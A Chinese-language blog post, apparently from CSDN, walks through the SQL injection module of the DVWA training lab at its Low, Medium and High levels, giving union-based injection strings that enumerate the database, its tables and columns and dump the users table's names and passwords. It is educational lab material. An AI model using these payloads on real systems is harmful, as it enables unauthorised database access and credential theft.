DVWA——SQL注入

已于 2024-04-07 21:08:46 修改
阅读量688 收藏 9
点赞数 24
分类专栏: DVWA靶场通关攻略(多角度分析) 文章标签: sql php 网络安全
于 2024-04-07 21:08:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74426634/article/details/137478295
版权

【原理】

日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。

网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。

SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Injection。

SQL Injection:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

首先让我们了解什么时候可能发生SQL Injection:

假设我们在浏览器中输入URL:www.sample.com,由于它只是对页面的简单请求无需对数据库动进行动态请求,所以它不存在SQL Injection,当我们输入www.sample.com?testid=23时,我们在URL中传递变量testid,并且提供值为23,由于它是对数据库进行动态查询的请求(其中?testid=23表示数据库查询变量),所以我们可以在该URL中嵌入恶意SQL语句。

初级SQL注入漏洞

点击DVWA Security,选择安全等级Low

选择SQL Injection在User ID输入数字1:

从显示的数据可以看出,经过了数据库的查询,尝试输入1':

通过尝试1' order by 1#,1' order by 2#,1' order by 3#得知该sql语句查询的只有2个字段:

在通过1' union select 1,2#得到可以显示数据的位置:

通过1' union select database(),2#得到当前数据库的名称:

通过1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#得到数据库里面的表:

通过1' union select group_concat(column_name),2 from information_schema.columns where table_name='user'#得到表的列名:

通过1' union select group_concat(User),group_concat(Password) from users#得到对应列的数据:

中级SQL注入漏洞

点击DVWA Security,选择安全等级Medium,点击Submit

选择SQL Injection在User ID选择数字1,点击Submit:

从显示的数据可以看出,经过了数据库的查询,根据下图改造浏览器,这样你每次点击Execute的时候就会把下面的参数当做POST类型的提交给服务器:

通过尝试修改数据包id字段为1 order by 1#,1 order by 2#,1 order by 3#得知该sql语句查询的只有2个字段:

在通过1 union select 1,2#得到可以显示数据的位置:

通过1 union select database(),2#得到当前数据库的名称:

通过1 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#得到数据库里面的表:

通过1 union select group_concat(column_name),2 from information_schema.columns where table_name=0x7573657273#得到表的列名:

通过1 union select group_concat(User),group_concat(Password) from users#得到对应列的数据:

高级SQL注入漏洞

点击DVWA Security,选择安全等级High,点击Submit

选择SQL Injection点击 here to change your ID,然后在弹出的输入框提交1:

从显示的数据可以看出,经过了数据库的查询。

通过尝试修改第一个数据包id字段为1' order by 1#,1' order by 2#,1' order by 3#得知该sql语句查询的只有2个字段:

在通过1' union select 1,2#得到可以显示数据的位置。

通过1' union select database(),2#得到当前数据库的名称:

通过1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#得到数据库里面的表:

通过1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#得到表的列名:

通过1' union select group_concat(User),group_concat(Password) from users#得到对应列的数据:

总结

Q0125.
关注
  • 24
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA通过攻略之SQL注入
勿山几已
05-24 6882
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWASQL注入的步骤
最新发布
XZZbh的博客
09-18 572
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 5420
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入。
DVWA-------简单的SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWASQL注入(盲注)
天空之蓝的博客
11-17 2163
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
2020-12-06-DVWAsql.md
01-24
dvwasql
DVWA-SQL注入
qq_60848021的博客
06-25 1100
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWASQL注入(低级)
heyingcheng的博客
11-17 2310
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入。
自学渗透测试:使用 DVWASQLmap 探寻 SQL 注入攻击与防范
weixin_43263566的博客
01-04 2362
SQL注入漏洞
DVWA渗透环境下SQL注入
skyattractive的博客
07-29 475
DVWA渗透环境下SQL注入 dvwa是一个randomstorm的开源项目,用来供给新手学习渗透测试的一个环境,里面共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入SQL Injection(Blind)(SQL盲注) XSS(Reflected
DVWA进行SQL注入
Jo_kong的博客
10-02 4745
我用的是在VMware下的虚拟机,在这就不说安装kali和win7了,各位自己去网上找一下大神们的教程,就很容易安装了。(统一说明:为了安全性等各方面考虑,下载软件最好到各大软件的官网上去下载)我用的系统如下: kali:192.168.0.183 进行SQL注入 win7:192.168.0.184 搭建dvwa环境 dvwa使用PHP写的,所以首先需要搭建web运行环境,我这里使用...
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 1万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
dvwa系列-sql注入
一个安全研究员
05-23 2197
前言 本篇博文就不详细讲解sql注入的成因了,有兴趣的就去看看我sqlilabs的博文吧,我后面会慢慢完成sqlilabs的博文 low 我们先来判断注入点吧,用最常规的单引号试一试,报错了,初步判断应该是字符型的单引号注入。 下面就推断一下后台执行的sql语句,因为这是一个根据输入的id来查找信息的地方嘛,后台sql大概是: select id,firstname,surname ...
DVWA-sql注入
Darklord.W
04-09 342
sql注入低中高步骤截图及说明 低: 判断注入类型 判断字段数 判断回显位置 查询数据库版本以及数据库名 查询数据库内表名 查询表内字段名 查询用户名密码 中: 发送到repeater 判断注入类型 猜字段数 判断回显位置 查询版本以及数据库 查询表名 查询字段名 高: Hig...
dvwa靶场sql注入中级
06-12
DVWASQL 注入中级靶场中,你需要利用 SQL 注入漏洞来获取数据库中的数据。具体步骤如下: 1. 打开 DVWASQL 注入中级靶场页面,输入用户名和密码,登录系统。 2. 在页面上找到一个输入框,例如搜索框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值